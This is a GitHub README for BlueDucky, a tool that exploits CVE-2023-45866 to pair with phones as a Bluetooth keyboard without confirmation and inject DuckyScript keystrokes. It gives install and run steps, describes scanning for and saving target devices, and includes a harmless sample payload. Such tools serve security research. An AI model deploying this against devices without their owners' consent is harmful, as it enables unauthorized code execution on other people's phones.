github.com/pentestfunctions/BlueDucky @main
README

BlueDucky Ver 2.1 (Android) 🦆

Thanks to all the people at HackNexus. Make sure you come join us on VC! https://discord.gg/HackNexus

NOTES: I will not be able to run this on a laptop or other device outside of a Raspberry Pi for testing. Due to this, any issues you have will need to be resolved among each other, as I do not have the spare funds to buy an adapter.

  1. saad0x1's GitHub
  2. spicydll's GitHub
  3. lamentomori's GitHub

🚨 CVE-2023-45866 - BlueDucky Implementation (Using DuckyScript)

🔓 Unauthenticated Pairing Leading to Code Execution (Using HID Keyboard)

This is an implementation of the attack behind CVE-2023-45866, discovered by marcnewlin.

Introduction 📢

BlueDucky exploits CVE-2023-45866, an unauthenticated-pairing flaw in Bluetooth HID hosts: it pairs with the target as a keyboard without any confirmation on the target and then injects keystrokes. By running this script, you can:

  1. 📡 Load saved Bluetooth devices that are no longer discoverable but still have Bluetooth enabled.
  2. 📂 Automatically save any devices you scan.
  3. 💌 Send keystrokes to the target as a DuckyScript payload.

I've successfully run this on a Raspberry Pi 4 using the default Bluetooth module. It works against various phones, with an interesting exception for a New Zealand brand, Vodafone.

Installation and Usage 🛠️

Setup Instructions for Debian-based

# update apt
sudo apt-get update
sudo apt-get -y upgrade

# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
                    git gcc python3-pip python3-setuptools \
                    python3-pydbus

# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# build bdaddr from the bluez source (the BlueZ tool for setting an adapter's Bluetooth address)
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

Setup Instructions for Arch-based

# update pacman & packages
sudo pacman -Syyu

# install dependencies
# Arch doesn't ship separate lib packages: libbluetooth-dev is included in the bluez package
sudo pacman -S bluez-tools bluez-utils bluez-deprecated-tools \
               python-setuptools python-pydbus python-dbus \
               git gcc python-pip

# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# build bdaddr from the bluez source (the BlueZ tool for setting an adapter's Bluetooth address)
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

Running BlueDucky

git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.py

Alternatively, install the pinned Python dependencies with pip instead of building pybluez from source:

pip3 install -r requirements.txt

Operational Steps 🕹️

  1. On startup, it prompts for the target MAC address.
  2. Submitting an empty address triggers an automatic scan for devices.
  3. Devices found by a scan are stored in known_devices.txt.
  4. If known_devices.txt exists, it is consulted before a new scan is run.
  5. The keystrokes to inject are read from payload.txt.
  6. On success, the tool connects to the target and runs the script.

Duckyscript 💻

🚧 Work in Progress: suggest ideas

Version 2.1 🐛

  • Updated UI
  • Improved user experience
  • Bluetooth debugger: checks your Bluetooth adapters and installed dependencies before allowing access to the application, so that unsupported setups are rejected up front.
  • Please note: numerous changes have been made; please reference the commit history for specific changes.

What's Planned for the Next Release?

  • Integrated DuckyScript console for attacks that want to maintain persistence after a payload has run
  • Suggest what should be added next! Join https://discord.gg/HackNexus

📝 Example payload.txt:

REM Title of the payload
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
REM Opens a private browser to hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300

Enjoy experimenting with BlueDucky! 🌟

Core symbols most depended-on inside this repo

  • send_keypress (BlueDucky.py): called by 18
  • send (BlueDucky.py): called by 12
  • encode_keyboard_input (BlueDucky.py): called by 6
  • run (utils/menu_functions.py): called by 4
  • power (BlueDucky.py): called by 3
  • create_connection (BlueDucky.py): called by 3
  • send_keyboard_combination (BlueDucky.py): called by 3
  • set_property (BlueDucky.py): called by 2

Shape

  • 29 methods, 26 functions, 13 classes

Languages

  • Python 100%

Modules by API surface

  • BlueDucky.py: 48 symbols
  • utils/menu_functions.py: 13 symbols
  • utils/register_device.py: 6 symbols
  • utils/magic_keyboard_hid.py: 1 symbol

Dependencies from manifests, versioned

  • PyBluez 0.30
  • PyGObject 3.48.1
  • dbus-python 1.3.2
  • pycairo 1.26.0
  • pydbus 0.6.0
  • setuptools 57.5.0
